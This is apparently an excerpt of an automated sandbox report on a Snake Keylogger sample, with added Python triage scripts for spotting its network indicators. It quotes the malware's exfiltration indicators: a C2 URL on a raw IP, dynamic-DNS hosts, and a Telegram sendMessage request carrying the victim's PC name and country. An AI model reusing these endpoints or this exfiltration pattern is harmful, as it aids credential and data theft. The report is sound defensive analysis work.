          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
          Source: powershell.exe, 00000002.00000002.1601132582.0000000005346000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.1603604758.000000000625A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
          Source: Undismembered.exe, 0000000A.00000002.2495516741.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.000000002063C000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
          Source: Undismembered.exe, 0000000A.00000002.2495516741.00000000205CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: Undismembered.exe, 0000000A.00000002.2495516741.00000000205F7000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.000000002063C000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020663000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
          Source: Undismembered.exe, 0000000A.00000002.2496698754.0000000021897000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2496698754.000000002185C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
          Source: Undismembered.exe, 0000000A.00000003.1728189274.00000000040E2000.00000004.00000020.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000003.1792265177.00000000040C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020741000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020732000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
          Source: Undismembered.exe, 0000000A.00000002.2495516741.0000000020741000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/4
          Source: Undismembered.exe, 0000000A.00000002.2495516741.000000002073C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
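The "String found in binary or memory" entries above mix the payload's own indicators (a hard-coded IP and several dynamic-DNS hosts on port 8081, the Telegram bot path with empty token and chat_id, and the mail host that matches the DNS query for mail.bsp.com.es and the TCP connection to port 587) with runtime noise from PowerShell's help and schema strings and with browser search-provider data, consistent with the browser-harvesting signatures listed for this sample. The Python below is an added triage example for this report; it is not Joe Sandbox output and not the malware's code. It parses entries in both the separated and the run-together form, assigns heuristic signals per URL and splits the list into indicators and noise. The sample entries are constructed copies of lines from this report with shortened dump ranges; the noise allow-list, the dynamic-DNS suffix list and the signal rules are the example's own assumptions, not a vendor rule set.

```python
"""Triage the report's 'String found in binary or memory' URL entries into
candidate C2/exfil indicators versus runtime noise.

Added example for this report: not Joe Sandbox output and not the malware's
code. SAMPLE_ENTRIES are CONSTRUCTED copies of entries from this report (dump
ranges shortened); the noise allow-list, the dynamic-DNS suffixes and the
signal rules are this example's assumptions, not a vendor rule set.
"""
import re
from urllib.parse import urlsplit

SAMPLE_ENTRIES = """\
Source: Undismembered.exe, 0000000A.00000002.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Undismembered.exe, 0000000A.00000002.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: Undismembered.exe, 0000000A.00000002.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: Undismembered.exe, 0000000A.00000002.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Undismembered.exe, 0000000A.00000002.sdmp | String found in binary or memory: http://mail.bsp.com.es
Source: powershell.exe, 00000002.00000002.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.sdmp | String found in binary or memory: https://contoso.com/License
Source: Undismembered.exe, 0000000A.00000002.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Undismembered.exe, 0000000A.00000002.sdmp | String found in binary or memory: https://www.office.com/
Source: URGENTE Ref.exe, Undismembered.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
"""

# Accepts both the 'Source: ... | String found' form and the run-together form.
ENTRY_RE = re.compile(r"^Source: (.*?)\s*\|?\s*String found in binary or memory: (\S+)\s*$")

# Hosts treated as benign here (assumption): PowerShell/.NET help and schema
# strings, the NSIS stub's error URL, and browser search-provider/home-page data.
NOISE_SUFFIXES = ("schemas.xmlsoap.org", "contoso.com", "nuget.org", "aka.ms",
                  "apache.org", "pesterbdd.com", "github.com", "nsis.sf.net",
                  "duckduckgo.com", "ecosia.org", "yahoo.com", "google.com",
                  "gstatic.com", "googletagmanager.com", "google-analytics.com",
                  "office.com")
# Free dynamic-DNS suffixes seen in this report's strings (assumption).
DYNDNS_SUFFIXES = ("duckdns.org", "kozow.com", "dns.army")
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def _under(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def parse_entries(text):
    """Return (process names, url) per entry; processes are the '.exe' tokens of the source field."""
    out = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue
        source, url = m.groups()
        procs = sorted({tok.strip() for tok in source.split(", ") if tok.strip().endswith(".exe")})
        out.append((procs, url))
    return out


def signals(url):
    """Heuristic signals for one URL; ['noise'] when the host is allow-listed."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    try:
        port = u.port
    except ValueError:      # non-numeric port in a corrupted string
        port = None
    if port is None:
        port = 443 if u.scheme == "https" else 80
    if _under(host, NOISE_SUFFIXES):
        return ["noise"]
    found = []
    if port not in (80, 443):
        found.append("nonstandard_port")
    if IPV4_RE.fullmatch(host):
        found.append("literal_ip")
    if _under(host, DYNDNS_SUFFIXES):
        found.append("dynamic_dns")
    if host == "api.telegram.org" and u.path.startswith("/bot"):
        found.append("telegram_bot_api")
    if host.startswith("mail."):
        found.append("mail_host")   # pairs with the DNS query and TCP/587 connection in this report
    return found


def triage(entries):
    """Group entries by URL and split them into indicators, noise and unclassified."""
    by_url = {}
    for procs, url in entries:
        by_url.setdefault(url, set()).update(procs)
    result = {"indicators": [], "noise": [], "unclassified": []}
    for url, procs in by_url.items():
        sig = signals(url)
        if sig == ["noise"]:
            result["noise"].append(url)
        elif sig:
            result["indicators"].append({"url": url, "processes": sorted(procs), "signals": sig})
        else:
            result["unclassified"].append(url)
    result["indicators"].sort(key=lambda r: (-len(r["signals"]), r["url"]))
    result["noise"].sort()
    result["unclassified"].sort()
    return result


if __name__ == "__main__":
    for rec in triage(parse_entries(SAMPLE_ENTRIES))["indicators"]:
        print(rec)
```

Run against the full entry list of a report, the indicator records carry the process names that held each string, which is how the exfil URLs are tied to Undismembered.exe rather than to the PowerShell stage.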
          Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 63195
          Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
          Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 63195 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknown | HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49696 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49698 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:63195 version: TLS 1.2
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
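Read in order, the request sequence above is the beaconing pattern Joe Sandbox attributes to Snake Keylogger: an external-IP lookup at checkip.dyndns.org with a fixed MSIE 6.0 User-Agent, a geolocation lookup at reallyfreegeoip.org/xml/<ip>, then a Telegram sendMessage carrying the PC name, a timestamp and the country. The bot token and chat_id in that URL are empty, so the request path is /bot/sendMessage with no token segment, and the 55-byte JSON 404 from api.telegram.org is the Bot API's answer to a request without a token; the exfil channel in this build is not functional. The Python below is an added example for this report, not Joe Sandbox output and not the malware's own code: it correlates the three stages per client over constructed proxy-style log lines copied from this report's requests, and decodes the sendMessage URL into its fields. The log-line layout, the stage names, the two-stage alert threshold and the treatment of an empty token or chat_id as misconfiguration are the example's assumptions.

```python
"""Correlate the beacon sequence this report shows for Snake Keylogger over
proxy-style HTTP log lines, and decode the Telegram sendMessage request.

Added example for this report: not Joe Sandbox output and not the malware's
code. SAMPLE_LOG is CONSTRUCTED from requests listed in the report; the log
field layout, the stage names and the alert threshold are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Legacy User-Agent the report shows on every checkip.dyndns.org request.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"

# Request path copied from the report's api.telegram.org request.
TELEGRAM_PATH = ("/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0A"
                 "Date%20and%20Time:%2011/03/2025%20/%2007:39:26%0D%0ACountry%20Name:"
                 "%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If"
                 "%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's"
                 "%20empty.%20%5D")

# Constructed log lines: "<client> <method> <host> <path> | <user-agent>".
SAMPLE_LOG = (
    f"192.168.2.6 GET checkip.dyndns.org / | {LEGACY_UA}\n"
    "192.168.2.6 GET reallyfreegeoip.org /xml/8.46.123.189 | -\n"
    f"192.168.2.6 GET api.telegram.org {TELEGRAM_PATH} | -\n"
    "192.168.2.7 GET checkip.dyndns.org / | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/134.0\n"
    "192.168.2.7 GET www.example.org /index.html | Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/134.0\n"
)

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) \| (.*)$")


def parse_line(line):
    """Split one log line into its fields; None when the layout does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, method, host, path, ua = m.groups()
    return {"client": client, "method": method, "host": host.lower(), "path": path, "ua": ua}


def classify(ev):
    """Name the beacon stage a request belongs to, or None for unrelated traffic."""
    if ev is None:
        return None
    if ev["host"] == "checkip.dyndns.org" and ev["ua"] == LEGACY_UA:
        return "external_ip_lookup"
    if ev["host"] == "reallyfreegeoip.org" and ev["path"].startswith("/xml/"):
        return "geoip_lookup"
    if ev["host"] == "api.telegram.org" and "/sendMessage" in ev["path"]:
        return "telegram_sendmessage"
    return None


def score_hosts(log_text):
    """Map each client to the sorted list of beacon stages it completed."""
    stages = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_line(line)
        stage = classify(ev)
        if stage:
            stages[ev["client"]].add(stage)
    return {client: sorted(seen) for client, seen in stages.items()}


def alerting_clients(log_text, minimum=2):
    """Clients that completed at least `minimum` stages (threshold is an assumption)."""
    return sorted(c for c, s in score_hosts(log_text).items() if len(s) >= minimum)


def decode_telegram_exfil(path):
    """Return bot token, chat_id and the 'Key: value' lines of the message text."""
    parts = urlsplit(path)
    m = re.fullmatch(r"/bot([^/]*)/sendMessage", parts.path)
    if not m:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # parse_qs percent-decodes values
    text = query.get("text", [""])[0].replace("\r\n", "\n")
    fields = {}
    for line in text.split("\n"):
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return {"token": m.group(1), "chat_id": query.get("chat_id", [""])[0],
            "fields": fields, "raw_text": text}


def is_misconfigured(decoded):
    """Empty token or chat_id: the Bot API cannot route the message (cf. the 404 in this report)."""
    return decoded is not None and (decoded["token"] == "" or decoded["chat_id"] == "")


if __name__ == "__main__":
    print(score_hosts(SAMPLE_LOG))
    print(alerting_clients(SAMPLE_LOG))
    print(decode_telegram_exfil(TELEGRAM_PATH))
```

The User-Agent check on the first stage matters: checkip.dyndns.org is also queried by legitimate tools, and it is the frozen MSIE 6.0 string on a modern Windows host, plus the follow-on geolocation and Telegram requests from the same client, that makes the sequence worth an alert.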

          System Summary

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Undismembered.exe
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_004049F9
          Source: C:\Users\user\Desktop\URGENTE Ref.exe | Code function: 0_2_004064AE
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_004049F9
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_004064AE
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015C19B
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015D278
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_00155370
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015C468
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015C738
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015E988
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_001569A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_001529E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015CA08
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015CCD8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_00159DE0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_00153E09
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015CFAC
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_00156FC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015F974
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_0015E97C
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_042A07E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_042A9CF0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_042A31F8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_042A03B4
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C2A90
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C1FA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C9448
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C1850
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C5148
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CF930
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C9668
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CD660
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CD670
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CD209
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CD218
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CDAC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CDAB9
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C2A80
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CE36A
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CE378
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CE377
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CDF20
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C0B20
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C0B30
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CDF11
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CE7CF
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CE7C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CE7D0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C1F98
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CF071
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C0040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C1841
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CEC28
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CEC18
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CF4C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C8CC0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CF4D8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C8CB1
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CF080
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CF922
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C9D38
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226C5138
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CCDC0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226CCDAF
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226EC560
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226E7B78
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226EE550
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226E81D0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226E8FB0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226ECE6F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226E3460
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226EAE7F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226E4A78
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exe | Code function: 10_2_226E6478
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E6E7210_2_226E6E72
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E6E7010_2_226E6E70
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EEE7010_2_226EEE70
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E1A4F10_2_226E1A4F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E004010_2_226E0040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EBC4010_2_226EBC40
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E1A4110_2_226E1A41
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EEE5F10_2_226EEE5F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E1A5010_2_226E1A50
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E9C5010_2_226E9C50
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E345010_2_226E3450
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EBC2F10_2_226EBC2F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E602210_2_226E6022
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E462210_2_226E4622
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E462010_2_226E4620
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EFC2010_2_226EFC20
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E9C3F10_2_226E9C3F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E603010_2_226E6030
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EDC3010_2_226EDC30
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E300810_2_226E3008
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E6A0710_2_226E6A07
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EAA0010_2_226EAA00
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EDC1F10_2_226EDC1F
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E6A1810_2_226E6A18
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EA0E010_2_226EA0E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E08F010_2_226E08F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E22F010_2_226E22F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EF2F010_2_226EF2F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E72CA10_2_226E72CA
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E72C810_2_226E72C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EE0C010_2_226EE0C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E4EC010_2_226E4EC0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EC0C010_2_226EC0C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EC0D010_2_226EC0D0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E4ED010_2_226E4ED0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EA0D010_2_226EA0D0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E1EA810_2_226E1EA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E38B810_2_226E38B8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EE0B010_2_226EE0B0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E648810_2_226E6488
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226ECE8010_2_226ECE80
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E049810_2_226E0498
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E1E9810_2_226E1E98
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226EAE9010_2_226EAE90
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E7B6910_2_226E7B69
